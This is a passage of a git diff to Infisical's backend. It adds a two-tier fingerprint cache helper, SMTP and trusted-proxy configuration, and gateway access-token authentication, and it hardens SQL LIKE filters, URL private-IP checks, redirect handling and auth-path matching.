result (e.g. to cap the TTL at the nearest expiry time of the data). + */ + ttlSeconds: number | ((result: T) => number); fetcher: () => Promise; + /** + * Optional post-parse callback to revive non-JSON-safe fields (e.g. Date + * objects) on cache hit. Called with the parsed value; may mutate it or + * return a new value. If it throws, the value is treated as a cache miss. + */ + reviver?: (parsed: T) => T | void; }; /** @@ -13,17 +57,12 @@ type TWithCacheOpts = { * or invalid cached JSON, and writes the result back to Redis. Redis write errors are caught and logged * β€” the fetcher is always the source of truth. 
*/ -export const withCache = async ({ keyStore, key, ttlSeconds, fetcher }: TWithCacheOpts): Promise => { - let cached: string | null = null; - try { - cached = await keyStore.getItem(key); - } catch (err) { - logger.warn({ key, err }, `withCache: cache read failed, falling back to fetcher [key=${key}]`); - } +export const withCache = async ({ keyStore, key, ttlSeconds, fetcher, reviver }: TWithCacheOpts): Promise => { + const cached = await cacheGet(keyStore, key, "withCache: cache read failed, falling back to fetcher"); if (cached !== null) { try { - return JSON.parse(cached) as T; + return applyReviver(JSON.parse(cached) as T, reviver); } catch (err) { logger.warn({ key, err }, `withCache: cache parse failed, falling back to fetcher [key=${key}]`); } @@ -31,11 +70,105 @@ export const withCache = async ({ keyStore, key, ttlSeconds, fetcher }: TWith const result = await fetcher(); + const ttl = typeof ttlSeconds === "function" ? ttlSeconds(result) : ttlSeconds; + await cacheSet(keyStore, key, ttl, JSON.stringify(result), "withCache: cache write failed"); + + return result; +}; + +type TWithCacheFingerprintOpts = { + keyStore: TCacheKeyStore; + dataKey: string; + markerKey: string; + markerTtlSeconds: number; + dataTtlSeconds: number; + fingerprintFetcher: () => Promise; + dataFetcher: () => Promise; + /** + * Optional post-parse callback to revive non-JSON-safe fields (e.g. Date + * objects) on cache hit. Called with the parsed payload; may mutate it or + * return a new value. If it throws, the value is treated as a cache miss. + */ + reviver?: (parsed: T) => T | void; +}; + +type TCachedData = { + fingerprint: string; + payload: T; +}; + +/** + * Two-tier cache-aside helper with fingerprint validation: + * - Short-lived marker (e.g. 10s) tracks recent validation + * - Long-lived data (e.g. 
10m) holds the actual payload + fingerprint + * + * On marker hit: serve cached data directly (0 DB reads) + * On marker miss: compute lightweight fingerprint (1 DB read); if it matches cached data, reset marker and serve; otherwise, full re-fetch + */ +export const withCacheFingerprint = async ({ + keyStore, + dataKey, + markerKey, + markerTtlSeconds, + dataTtlSeconds, + fingerprintFetcher, + dataFetcher, + reviver +}: TWithCacheFingerprintOpts): Promise => { + const [markerValue, cachedDataStr] = await Promise.all([ + cacheGet(keyStore, markerKey, "withCacheFingerprint: marker read failed"), + cacheGet(keyStore, dataKey, "withCacheFingerprint: data read failed") + ]); + + // Marker + data hit: return cached data directly (fast path, 0 DB reads) + if (markerValue !== null && cachedDataStr !== null) { + try { + const { payload } = JSON.parse(cachedDataStr) as TCachedData; + return applyReviver(payload, reviver); + } catch (err) { + logger.warn( + { key: dataKey, err }, + `withCacheFingerprint: cached data parse failed, falling back to fingerprint check [key=${dataKey}]` + ); + } + } + + // Marker expired or cache miss β€” compute fingerprint (1 lightweight DB read) + let currentFingerprint: string; try { - await keyStore.setItemWithExpiry(key, ttlSeconds, JSON.stringify(result)); + currentFingerprint = await fingerprintFetcher(); } catch (err) { - logger.warn({ key, err }, `withCache: cache write failed [key=${key}]`); + logger.error({ err }, `withCacheFingerprint: fingerprint fetch failed, bypassing cache`); + return dataFetcher(); } + // Data exists and fingerprint matches: reset marker and return (1 DB read total) + if (cachedDataStr !== null) { + try { + const cachedData = JSON.parse(cachedDataStr) as TCachedData; + if (cachedData.fingerprint === currentFingerprint) { + await cacheSet(keyStore, markerKey, markerTtlSeconds, "1", "withCacheFingerprint: marker reset failed"); + return applyReviver(cachedData.payload, reviver); + } + } catch (err) { + logger.error( 
+ { key: dataKey, err }, + `withCacheFingerprint: cached data parse failed, falling back to full fetch [key=${dataKey}]` + ); + } + } + + // Fingerprint mismatch or no cached data β€” full re-fetch + const result = await dataFetcher(); + + await cacheSet( + keyStore, + dataKey, + dataTtlSeconds, + JSON.stringify({ fingerprint: currentFingerprint, payload: result }), + "withCacheFingerprint: data write failed" + ); + await cacheSet(keyStore, markerKey, markerTtlSeconds, "1", "withCacheFingerprint: marker write failed"); + return result; }; diff --git a/backend/src/lib/config/env.ts b/backend/src/lib/config/env.ts index 63ad119b5d2..af23082a903 100644 --- a/backend/src/lib/config/env.ts +++ b/backend/src/lib/config/env.ts @@ -142,6 +142,9 @@ const envSchema = z GENERATE_SANITIZED_SCHEMA: zodStrBool .default("false") .describe("Generate sanitized schema with views after migrations"), + FAIL_ON_SANITIZED_SCHEMA_ERROR: zodStrBool + .default("false") + .describe("Exit startup when sanitized schema generation fails"), SANITIZED_SCHEMA_ROLE: zpStr( z.string().describe("PostgreSQL role to grant read access to the sanitized schema").optional() ), @@ -199,6 +202,14 @@ const envSchema = z SMTP_PASSWORD: zpStr(z.string().optional()), SMTP_FROM_ADDRESS: zpStr(z.string().optional()), SMTP_FROM_NAME: zpStr(z.string().optional().default("Infisical")), + SMTP_HELO_HOST: zpStr( + z + .string() + .optional() + .describe( + "Hostname announced in the SMTP EHLO/HELO greeting. Defaults to the OS hostname, which may not be a valid FQDN inside containers." 
+ ) + ), SMTP_CUSTOM_CA_CERT: zpStr( z.string().optional().describe("Base64 encoded custom CA certificate PEM(s) for the SMTP server") ), @@ -297,6 +308,7 @@ const envSchema = z .transform((val) => val === "true" || IS_PACKAGED) .optional(), INFISICAL_CLOUD: zodStrBool.default("false"), + INFISICAL_DEDICATED: zodStrBool.default("false"), MAINTENANCE_MODE: zodStrBool.default("false"), CAPTCHA_SECRET: zpStr(z.string().optional()), CAPTCHA_SITE_KEY: zpStr(z.string().optional()), @@ -453,6 +465,14 @@ const envSchema = z }) ), + // Reverse Proxy ----------------------------------------------------------------------------- + // Comma-separated list of trusted proxy CIDRs (e.g. "10.0.0.0/8,172.16.0.0/12") or + // proxy-addr aliases ("loopback", "linklocal", "uniquelocal"). When set, requests whose + // socket remote address is NOT in this set will have forwarded-IP headers ignored; the + // socket address is used as the real IP. When unset, legacy first-header-wins behavior + // is preserved for backwards compatibility. + TRUSTED_PROXY_CIDRS: zpStr(z.string().optional()), + /* OracleDB ----------------------------------------------------------------------------- */ TNS_ADMIN: zpStr(z.string().optional()), @@ -938,6 +958,7 @@ export const formatSmtpConfig = () => { return { host: envCfg.SMTP_HOST, port: envCfg.SMTP_PORT, + name: envCfg.SMTP_HELO_HOST, auth: envCfg.SMTP_USERNAME && envCfg.SMTP_PASSWORD ? 
{ user: envCfg.SMTP_USERNAME, pass: envCfg.SMTP_PASSWORD } diff --git a/backend/src/lib/config/request.ts b/backend/src/lib/config/request.ts index b8bd4b282b7..e45874db7d0 100644 --- a/backend/src/lib/config/request.ts +++ b/backend/src/lib/config/request.ts @@ -26,7 +26,7 @@ export function axiosResponseInterceptor(response: AxiosResponse, customLogger: } export function createRequestClient(defaults: CreateAxiosDefaults = {}, retry: IAxiosRetryConfig = {}): AxiosInstance { - const client = axios.create(defaults); + const client = axios.create({ ...defaults, maxRedirects: 0 }); client.interceptors.response.use((response) => axiosResponseInterceptor(response, logger)); diff --git a/backend/src/lib/gateway-v2/gateway-v2.ts b/backend/src/lib/gateway-v2/gateway-v2.ts index 16eb8e8ca7c..3a5a7fcc96c 100644 --- a/backend/src/lib/gateway-v2/gateway-v2.ts +++ b/backend/src/lib/gateway-v2/gateway-v2.ts @@ -1,7 +1,7 @@ import net from "node:net"; import tls from "node:tls"; -import axios from "axios"; +import { isAxiosError } from "axios"; import https from "https"; import { verifyHostInputValidity } from "@app/ee/services/dynamic-secret/dynamic-secret-fns"; @@ -287,7 +287,7 @@ export const withGatewayV2Proxy = async ( } logger.error("Gateway error:", err instanceof Error ? err.message : String(err)); let errorMessage = relayErrorMessage || (err instanceof Error ? 
err.message : String(err)); - if (axios.isAxiosError(err) && (err.response?.data as { message?: string })?.message) { + if (isAxiosError(err) && (err.response?.data as { message?: string })?.message) { errorMessage = (err.response?.data as { message: string }).message; } diff --git a/backend/src/lib/gateway/gateway.ts b/backend/src/lib/gateway/gateway.ts index 9a4dd789b12..f5d551fa230 100644 --- a/backend/src/lib/gateway/gateway.ts +++ b/backend/src/lib/gateway/gateway.ts @@ -2,7 +2,7 @@ import net from "node:net"; import quicDefault, * as quicModule from "@infisical/quic"; -import axios from "axios"; +import { isAxiosError } from "axios"; import https from "https"; import { crypto } from "@app/lib/crypto/cryptography"; @@ -417,7 +417,7 @@ export const withGatewayProxy = async ( } logger.error(err, "Failed to do gateway"); let errorMessage = proxyErrorMessage || (err as Error)?.message; - if (axios.isAxiosError(err) && (err.response?.data as { message?: string })?.message) { + if (isAxiosError(err) && (err.response?.data as { message?: string })?.message) { errorMessage = (err.response?.data as { message: string }).message; } diff --git a/backend/src/lib/knex/dynamic.ts b/backend/src/lib/knex/dynamic.ts index a57464fac58..0807c52201f 100644 --- a/backend/src/lib/knex/dynamic.ts +++ b/backend/src/lib/knex/dynamic.ts @@ -1,6 +1,7 @@ import { Knex } from "knex"; import { UnauthorizedError } from "../errors"; +import { sanitizeSqlLikeString } from "../fn"; type TKnexDynamicPrimitiveOperator = | { @@ -47,11 +48,11 @@ export const buildDynamicKnexQuery = ( break; } case "startsWith": { - void queryBuilder.whereILike(filterAst.field, `${filterAst.value}%`); + void queryBuilder.whereILike(filterAst.field, `${sanitizeSqlLikeString(filterAst.value)}%`); break; } case "endsWith": { - void queryBuilder.whereILike(filterAst.field, `%${filterAst.value}`); + void queryBuilder.whereILike(filterAst.field, `%${sanitizeSqlLikeString(filterAst.value)}`); break; } case "notIn": { diff 
--git a/backend/src/lib/knex/index.ts b/backend/src/lib/knex/index.ts index 230d5cb3920..123931fec1b 100644 --- a/backend/src/lib/knex/index.ts +++ b/backend/src/lib/knex/index.ts @@ -5,6 +5,7 @@ import { Tables } from "knex/types/tables"; import { TableName } from "@app/db/schemas"; import { DatabaseError } from "../errors"; +import { sanitizeSqlLikeString } from "../fn"; import { buildDynamicKnexQuery, TKnexDynamicOperator } from "./dynamic"; export * from "./connection"; @@ -70,7 +71,7 @@ export const buildFindFilter = if ($search) { Object.entries($search).forEach(([key, val]) => { if (val) { - void bd.whereILike(`${tableName ? `${tableName}.` : ""}${key}`, val as never); + void bd.whereILike(`${tableName ? `${tableName}.` : ""}${key}`, `%${sanitizeSqlLikeString(val as string)}%`); } }); } @@ -108,7 +109,7 @@ export type TOrmify = { findById: (id: string, tx?: Knex) => Promise; find: ( filter: TFindFilter, - { offset, limit, sort, count, tx, countDistinct }?: TFindOpt + opts?: TFindOpt ) => Promise>; findOne: (filter: Partial, tx?: Knex) => Promise; create: (data: Tables[Tname]["insert"], tx?: Knex) => Promise; diff --git a/backend/src/lib/knex/scim.ts b/backend/src/lib/knex/scim.ts index d522e2f5f9c..3758ed984b0 100644 --- a/backend/src/lib/knex/scim.ts +++ b/backend/src/lib/knex/scim.ts @@ -3,6 +3,9 @@ import { Compare, Filter, parse } from "scim2-parse-filter"; import { TableName } from "@app/db/schemas"; +import { BadRequestError } from "../errors"; +import { sanitizeSqlLikeString } from "../fn"; + const appendParentToGroupingOperator = (parentPath: string, filter: Filter) => { if (filter.op !== "[]" && filter.op !== "and" && filter.op !== "or" && filter.op !== "not") { return { ...filter, attrPath: `${parentPath}.${(filter as Compare).attrPath}` }; @@ -64,7 +67,10 @@ const processDynamicQuery = ( } case "sw": { const attrPath = getAttributeField(scimFilterAst.attrPath); - if (attrPath) void query.whereILike(attrPath, `${scimFilterAst.compValue}%`); + if 
(!scimFilterAst.compValue || !attrPath) { + throw new BadRequestError({ message: "compValue is required for sw filter" }); + } + void query.whereILike(attrPath, `${sanitizeSqlLikeString(String(scimFilterAst.compValue))}%`); break; } case "ew": { @@ -73,7 +79,8 @@ const processDynamicQuery = ( if (attrPath === `${TableName.Users}.email` && typeof sanitizedValue === "string") { sanitizedValue = sanitizedValue.toLowerCase(); } - if (attrPath) void query.whereILike(attrPath, `%${sanitizedValue}`); + if (attrPath && sanitizedValue) + void query.whereILike(attrPath, `%${sanitizeSqlLikeString(String(sanitizedValue))}`); break; } case "co": { @@ -82,7 +89,8 @@ const processDynamicQuery = ( if (attrPath === `${TableName.Users}.email` && typeof sanitizedValue === "string") { sanitizedValue = sanitizedValue.toLowerCase(); } - if (attrPath) void query.whereILike(attrPath, `%${sanitizedValue}%`); + if (attrPath && sanitizedValue) + void query.whereILike(attrPath, `%${sanitizeSqlLikeString(String(sanitizedValue))}%`); break; } case "ne": { diff --git a/backend/src/lib/logger/logger.ts b/backend/src/lib/logger/logger.ts index 591bc06556e..bf446835c0c 100644 --- a/backend/src/lib/logger/logger.ts +++ b/backend/src/lib/logger/logger.ts @@ -4,7 +4,6 @@ // easier to use it that's all. 
import { requestContext } from "@fastify/request-context"; import pino, { Logger } from "pino"; -import { z } from "zod"; import { RequestContextKey } from "@app/lib/request-context/request-context-keys"; @@ -48,15 +47,6 @@ export interface CustomLogger extends Omit; -const loggerConfig = z.object({ - AWS_CLOUDWATCH_LOG_GROUP_NAME: z.string().default("infisical-log-stream"), - AWS_CLOUDWATCH_LOG_REGION: z.string().default("us-east-1"), - AWS_CLOUDWATCH_LOG_ACCESS_KEY_ID: z.string().min(1).optional(), - AWS_CLOUDWATCH_LOG_ACCESS_KEY_SECRET: z.string().min(1).optional(), - AWS_CLOUDWATCH_LOG_INTERVAL: z.coerce.number().default(1000), - NODE_ENV: z.enum(["development", "test", "production"]).default("production") -}); - const redactedKeys = [ "accessToken", "authToken", @@ -81,6 +71,9 @@ const redactedKeys = [ "encryptedKey", "plaintextProjectKey", "accessKey", + "accessKeyId", + "secretAccessKey", + "sessionToken", "botKey", "decryptedSecret", "secrets", @@ -114,7 +107,6 @@ const extractOrgId = () => { }; export const initLogger = () => { - const cfg = loggerConfig.parse(process.env); const targets: pino.TransportMultiOptions["targets"][number][] = [ { level: "info", @@ -126,21 +118,6 @@ export const initLogger = () => { } ]; - if (cfg.AWS_CLOUDWATCH_LOG_ACCESS_KEY_ID && cfg.AWS_CLOUDWATCH_LOG_ACCESS_KEY_SECRET) { - targets.push({ - target: "@serdnam/pino-cloudwatch-transport", - level: "info", - options: { - logGroupName: cfg.AWS_CLOUDWATCH_LOG_GROUP_NAME, - logStreamName: cfg.AWS_CLOUDWATCH_LOG_GROUP_NAME, - awsRegion: cfg.AWS_CLOUDWATCH_LOG_REGION, - awsAccessKeyId: cfg.AWS_CLOUDWATCH_LOG_ACCESS_KEY_ID, - awsSecretAccessKey: cfg.AWS_CLOUDWATCH_LOG_ACCESS_KEY_SECRET, - interval: cfg.AWS_CLOUDWATCH_LOG_INTERVAL - } - }); - } - const transport = pino.transport({ targets }); diff --git a/backend/src/lib/request-context/memo-keys.ts b/backend/src/lib/request-context/memo-keys.ts index 8f6a1300645..17e3680ab3f 100644 --- a/backend/src/lib/request-context/memo-keys.ts 
+++ b/backend/src/lib/request-context/memo-keys.ts @@ -41,5 +41,9 @@ export const requestMemoKeys = { userFindById: (userId: string) => `user:findById:${userId}`, - identityFindById: (identityId: string) => `identity:findById:${identityId}` + identityFindById: (identityId: string) => `identity:findById:${identityId}`, + + orgFindById: (orgId: string) => `org:findById:${orgId}`, + + orgFindOrgById: (orgId: string) => `org:findOrgById:${orgId}` }; diff --git a/backend/src/lib/search-resource/db.ts b/backend/src/lib/search-resource/db.ts index fc450d9f918..51c0e82c4f5 100644 --- a/backend/src/lib/search-resource/db.ts +++ b/backend/src/lib/search-resource/db.ts @@ -1,5 +1,6 @@ import { Knex } from "knex"; +import { sanitizeSqlLikeString } from "../fn"; import { SearchResourceOperators, TSearchResourceOperator } from "./search"; const buildKnexQuery = ( @@ -65,15 +66,15 @@ const buildKnexQuery = ( if (typeof value !== "string") throw new Error("Invalid value type for $contains operator"); if (typeof fields === "string") { - return void query.whereILike(fields, `%${value}%`); + return void query.whereILike(fields, `%${sanitizeSqlLikeString(value)}%`); } return void query.where((qb) => { return fields.forEach((el, index) => { if (index === 0) { - return void qb.whereILike(el, `%${value}%`); + return void qb.whereILike(el, `%${sanitizeSqlLikeString(value)}%`); } - return void qb.orWhereILike(el, `%${value}%`); + return void qb.orWhereILike(el, `%${sanitizeSqlLikeString(value)}%`); }); }); } diff --git a/backend/src/lib/validator/validate-url.ts b/backend/src/lib/validator/validate-url.ts index b96d1bfe4df..d7127de1d73 100644 --- a/backend/src/lib/validator/validate-url.ts +++ b/backend/src/lib/validator/validate-url.ts @@ -1,6 +1,6 @@ import dns from "node:dns/promises"; -import { isIPv4 } from "net"; +import { isIP } from "net"; import RE2 from "re2"; import { verifyHostInputValidity } from "@app/ee/services/dynamic-secret/dynamic-secret-fns"; @@ -22,28 +22,19 @@ export 
const blockLocalAndPrivateIpAddresses = async (url: string, isGateway = f } const inputHostIps: string[] = []; - if (isIPv4(validUrl.hostname)) { + if (isIP(validUrl.hostname)) { inputHostIps.push(validUrl.hostname); } else { if (validUrl.hostname === "localhost" || validUrl.hostname === "host.docker.internal") { throw new BadRequestError({ message: "Local IPs not allowed as URL" }); } - try { - const resolvedIps = await dns.resolve4(validUrl.hostname); - inputHostIps.push(...resolvedIps); - } catch (err) { - if ((err as { code: string })?.code !== "ENOTFOUND") throw err; + const entries = await dns.lookup(validUrl.hostname, { all: true }); - const entries = await dns.lookup(validUrl.hostname, { all: true, family: 4 }); - - if (!entries || entries.length === 0) { - throw new BadRequestError({ message: "Could not resolve hostname to any IPv4 address" }); - } - - const resolvedIps = entries.map(({ address }) => address); - - inputHostIps.push(...resolvedIps); + if (!entries || entries.length === 0) { + throw new BadRequestError({ message: "Could not resolve hostname to any IP address" }); } + + inputHostIps.push(...entries.map(({ address }) => address)); } const isInternalIp = inputHostIps.some((el) => isPrivateIp(el)); if (isInternalIp && !appCfg.ALLOW_INTERNAL_IP_CONNECTIONS) diff --git a/backend/src/lib/workflow-integrations/trigger-notification.ts b/backend/src/lib/workflow-integrations/trigger-notification.ts index 2dc6f61fe93..4e28ea5b9d9 100644 --- a/backend/src/lib/workflow-integrations/trigger-notification.ts +++ b/backend/src/lib/workflow-integrations/trigger-notification.ts @@ -1,4 +1,6 @@ import { logger } from "../logger"; +import { requestMemoKeys } from "../request-context/memo-keys"; +import { requestMemoize } from "../request-context/request-memoizer"; import { triggerMicrosoftTeamsNotification } from "./notification-handlers/microsoft-teams"; import { triggerSlackNotification } from "./notification-handlers/slack"; import { 
TTriggerWorkflowNotificationDTO } from "./types"; @@ -9,7 +11,9 @@ export const triggerWorkflowIntegrationNotification = async (dto: TTriggerWorkfl const { projectDAL, projectSlackConfigDAL, kmsService, projectMicrosoftTeamsConfigDAL, microsoftTeamsService } = dto.dependencies; - const project = await projectDAL.findById(projectId); + const project = await requestMemoize(requestMemoKeys.projectFindById(projectId), () => + projectDAL.findById(projectId) + ); if (!project) { return; diff --git a/backend/src/queue/queue-service.ts b/backend/src/queue/queue-service.ts index 50eb951dcc5..784c41f5dc0 100644 --- a/backend/src/queue/queue-service.ts +++ b/backend/src/queue/queue-service.ts @@ -54,7 +54,6 @@ import { TWebhookPayloads } from "@app/services/webhook/webhook-types"; export const JOB_SCHEDULER_PREFIX = "jsv1"; export enum QueueName { - SecretRotation = "secret-rotation", SecretReminder = "secret-reminder", AuditLog = "audit-log", // TODO(akhilmhdh): This will get removed later. For now this is kept to stop the repeatable queue @@ -105,12 +104,12 @@ export enum QueueName { AuditLogClickHouseBatch = "audit-log-clickhouse-batch", PamDiscoveryScan = "pam-discovery-scan", CaAutoRenewal = "ca-auto-renewal", - CertificateCleanup = "certificate-cleanup" + CertificateCleanup = "certificate-cleanup", + DigiCertOrderPolling = "digicert-order-polling" } export enum QueueJobs { SecretReminder = "secret-reminder-job", - SecretRotation = "secret-rotation-job", AuditLog = "audit-log-job", // TODO(akhilmhdh): This will get removed later. 
For now this is kept to stop the repeatable queue AuditLogPrune = "audit-log-prune-job", @@ -177,7 +176,8 @@ export enum QueueJobs { CaVenafiInstall = "ca-venafi-install-job", CaAdcsInstall = "ca-adcs-install-job", CertificateCleanup = "certificate-cleanup-job", - DailySecretSyncRetry = "daily-secret-sync-retry-job" + DailySecretSyncRetry = "daily-secret-sync-retry-job", + DigiCertOrderPolling = "digicert-order-polling-job" } export type TQueueOptions = { @@ -211,10 +211,6 @@ export type TQueueJobTypes = { }; name: QueueJobs.SecretReminder; }; - [QueueName.SecretRotation]: { - payload: { rotationId: string }; - name: QueueJobs.SecretRotation; - }; [QueueName.AuditLog]: { name: QueueJobs.AuditLog; payload: TCreateAuditLogDTO; @@ -551,6 +547,10 @@ export type TQueueJobTypes = { name: QueueJobs.CertificateCleanup; payload: undefined; }; + [QueueName.DigiCertOrderPolling]: { + name: QueueJobs.DigiCertOrderPolling; + payload: undefined; + }; }; const SECRET_SCANNING_QUEUES = [ @@ -649,7 +649,7 @@ export const queueServiceFactory = (redisCfg: TRedisConfigKeys): TQueueServiceFa // Remove orphaned job schedulers left in Redis by the QueueInternalRecovery/QueueInternalReconciliation deleted queues. void (async () => { - const staleQueueNames = ["queue-internal-recovery", "queue-internal-reconciliation"]; + const staleQueueNames = ["queue-internal-recovery", "queue-internal-reconciliation", "secret-rotation"]; await Promise.allSettled( staleQueueNames.map(async (name) => { const staleQueue = new Queue(name, { diff --git a/backend/src/server/app.ts b/backend/src/server/app.ts index 53095cefcfd..6ff780af65d 100644 --- a/backend/src/server/app.ts +++ b/backend/src/server/app.ts @@ -75,7 +75,9 @@ export const main = async ({ const server = fastify({ logger: appCfg.NODE_ENV === "test" ? 
false : logger, genReqId: () => `req-${alphaNumericNanoId(14)}`, - trustProxy: true, + // When TRUSTED_PROXY_CIDRS is configured, only requests from those sources have their + // forwarded-IP headers honored. Unset preserves legacy behavior (trust all) for backcompat. + trustProxy: appCfg.TRUSTED_PROXY_CIDRS ?? true, connectionTimeout: 100_000, ignoreTrailingSlash: true, diff --git a/backend/src/server/plugins/audit-log.ts b/backend/src/server/plugins/audit-log.ts index d0198e7bf0a..725f8b5ca5f 100644 --- a/backend/src/server/plugins/audit-log.ts +++ b/backend/src/server/plugins/audit-log.ts @@ -50,10 +50,12 @@ export const injectAuditLogInfo = fp(async (server: FastifyZodProvider) => { req.auditLogInfo = payload; return; } + if (req.auth.actor === ActorType.USER) { payload.actor = { type: ActorType.USER, metadata: { + ...(req.auth.authMethod ? { authMethod: req.auth.authMethod } : {}), email: req.auth.user.email, username: req.auth.user.username, userId: req.permission.id @@ -75,6 +77,7 @@ export const injectAuditLogInfo = fp(async (server: FastifyZodProvider) => { metadata: { name: req.auth.identityName, identityId: req.auth.identityId, + ...(identityAuthInfo?.authMethod ? { authMethod: identityAuthInfo.authMethod } : {}), ...(identityAuthInfo?.aws ? { aws: identityAuthInfo.aws } : {}), ...(identityAuthInfo?.kubernetes ? { kubernetes: identityAuthInfo.kubernetes } : {}), ...(identityAuthInfo?.oidc ? 
{ oidc: identityAuthInfo.oidc } : {}) @@ -85,6 +88,13 @@ export const injectAuditLogInfo = fp(async (server: FastifyZodProvider) => { type: ActorType.SCIM_CLIENT, metadata: {} }; + } else if (req.auth.actor === ActorType.GATEWAY) { + payload.actor = { + type: ActorType.GATEWAY, + metadata: { + gatewayId: req.permission.id + } + }; } else { throw new BadRequestError({ message: "Invalid actor type provided" }); } diff --git a/backend/src/server/plugins/auth/inject-assume-privilege.ts b/backend/src/server/plugins/auth/inject-assume-privilege.ts index 46c6ea8e3c0..f22d2ab5643 100644 --- a/backend/src/server/plugins/auth/inject-assume-privilege.ts +++ b/backend/src/server/plugins/auth/inject-assume-privilege.ts @@ -9,9 +9,11 @@ export const injectAssumePrivilege = fp(async (server: FastifyZodProvider) => { const assumeRoleCookie = req.cookies["infisical-project-assume-privileges"]; try { if (req?.auth?.authMode === AuthMode.JWT && assumeRoleCookie) { - const decodedToken = server.services.assumePrivileges.verifyAssumePrivilegeToken( + const decodedToken = await server.services.assumePrivileges.verifyAssumePrivilegeToken( assumeRoleCookie, - req.auth.tokenVersionId + req.auth.tokenVersionId, + req.auth.authMethod, + req.auth.orgId ); if (decodedToken) { requestContext.set(RequestContextKey.AssumedPrivilegeDetails, decodedToken); diff --git a/backend/src/server/plugins/auth/inject-identity.ts b/backend/src/server/plugins/auth/inject-identity.ts index 857f9418136..378a23ea181 100644 --- a/backend/src/server/plugins/auth/inject-identity.ts +++ b/backend/src/server/plugins/auth/inject-identity.ts @@ -7,7 +7,7 @@ import { TServiceTokens, TUsers } from "@app/db/schemas"; import { TScimTokenJwtPayload } from "@app/ee/services/scim/scim-types"; import { getConfig } from "@app/lib/config/env"; import { crypto } from "@app/lib/crypto"; -import { BadRequestError } from "@app/lib/errors"; +import { BadRequestError, UnauthorizedError } from "@app/lib/errors"; import { 
RequestContextKey } from "@app/lib/request-context/request-context-keys"; import { ActorType, @@ -15,7 +15,8 @@ import { AuthMode, AuthModeJwtTokenPayload, AuthTokenType, - MfaMethod + MfaMethod, + TGatewayAccessTokenJwtPayload } from "@app/services/auth/auth-type"; import { TIdentityAccessTokenJwtPayload } from "@app/services/identity-access-token/identity-access-token-types"; import { getServerCfg } from "@app/services/super-admin/super-admin-service"; @@ -77,6 +78,16 @@ export type TAuthMode = rootOrgId: string; parentOrgId: string; authMethod: null; + } + | { + authMode: AuthMode.GATEWAY_ACCESS_TOKEN; + actor: ActorType.GATEWAY; + gatewayId: string; + orgId: string; + rootOrgId: string; + parentOrgId: string; + authMethod: null; + token: TGatewayAccessTokenJwtPayload; }; export const extractAuth = async (req: FastifyRequest, jwtSecret: string) => { @@ -129,6 +140,12 @@ export const extractAuth = async (req: FastifyRequest, jwtSecret: string) => { token: decodedToken as TScimTokenJwtPayload, actor: ActorType.SCIM_CLIENT } as const; + case AuthTokenType.GATEWAY_ACCESS_TOKEN: + return { + authMode: AuthMode.GATEWAY_ACCESS_TOKEN, + token: decodedToken as TGatewayAccessTokenJwtPayload, + actor: ActorType.GATEWAY + } as const; default: return { authMode: null, token: null } as const; } @@ -159,30 +176,42 @@ export const injectIdentity = fp( return; } + // Match against the pathname only β€” req.url includes the query string, which a + // client can use to smuggle matching substrings and skip auth injection. 
+ const pathname = req.url.split("?", 1)[0]; + if ( - req.url.includes(".well-known/est") || - req.url.includes("/scep/") || - (req.url.includes("/api/v3/auth/") && !req.url.includes("/api/v3/auth/select-organization")) + pathname.startsWith("/.well-known/est") || + (pathname.startsWith("/api/v3/auth/") && !pathname.startsWith("/api/v3/auth/select-organization")) ) { return; } - if (req.url === "/api/v1/ai/mcp/servers/oauth/callback") { + if (pathname.includes("/scep/") && pathname.includes("pkiclient.exe")) { + return; + } + + if (pathname === "/api/v1/ai/mcp/servers/oauth/callback") { return; } // Authentication is handled on a route-level - if (req.url === "/api/v1/relays/register-instance-relay") { + if (pathname === "/api/v1/relays/register-instance-relay") { + return; + } + + // Authentication is handled on a route-level (enrollment token in body) + if (pathname === "/api/v3/gateways/token-auth/enroll") { return; } // Authentication is handled on a route-level - if (req.url === "/api/v1/relays/heartbeat-instance-relay") { + if (pathname === "/api/v1/relays/heartbeat-instance-relay") { return; } // Authentication is handled on a route-level here. 
- if (req.url.includes("/api/v1/workflow-integrations/microsoft-teams/message-endpoint")) { + if (pathname.startsWith("/api/v1/workflow-integrations/microsoft-teams/message-endpoint")) { return; } @@ -321,6 +350,27 @@ export const injectIdentity = fp( }; break; } + case AuthMode.GATEWAY_ACCESS_TOKEN: { + const gateway = await server.services.gatewayV2.getGatewayById({ gatewayId: token.gatewayId }); + + if (gateway.tokenVersion !== token.tokenVersion) { + throw new UnauthorizedError({ message: "Gateway token has been revoked" }); + } + + requestContext.set(RequestContextKey.OrgId, token.orgId); + + req.auth = { + authMode: AuthMode.GATEWAY_ACCESS_TOKEN, + actor, + gatewayId: token.gatewayId, + orgId: token.orgId, + rootOrgId: token.orgId, + parentOrgId: token.orgId, + authMethod: null, + token + }; + break; + } default: throw new BadRequestError({ message: "Invalid token strategy provided" }); } diff --git a/backend/src/server/plugins/auth/inject-permission.ts b/backend/src/server/plugins/auth/inject-permission.ts index 827a055d3cb..b19f7cd97ab 100644 --- a/backend/src/server/plugins/auth/inject-permission.ts +++ b/backend/src/server/plugins/auth/inject-permission.ts @@ -61,6 +61,19 @@ export const injectPermission = fp(async (server) => { logger.info( `injectPermission: Injecting permissions for [permissionsForIdentity=${req.auth.scimTokenId}] [type=${ActorType.SCIM_CLIENT}]` ); + } else if (req.auth.actor === ActorType.GATEWAY) { + req.permission = { + type: ActorType.GATEWAY, + id: req.auth.gatewayId, + orgId: req.auth.orgId, + rootOrgId: req.auth.rootOrgId, + parentOrgId: req.auth.parentOrgId, + authMethod: null + }; + + logger.info( + `injectPermission: Injecting permissions for [permissionsForGateway=${req.auth.gatewayId}] [type=${ActorType.GATEWAY}]` + ); } }); }); diff --git a/backend/src/server/plugins/ip.ts b/backend/src/server/plugins/ip.ts index 7b5838d57b1..4096bb8eb9c 100644 --- a/backend/src/server/plugins/ip.ts +++ b/backend/src/server/plugins/ip.ts 
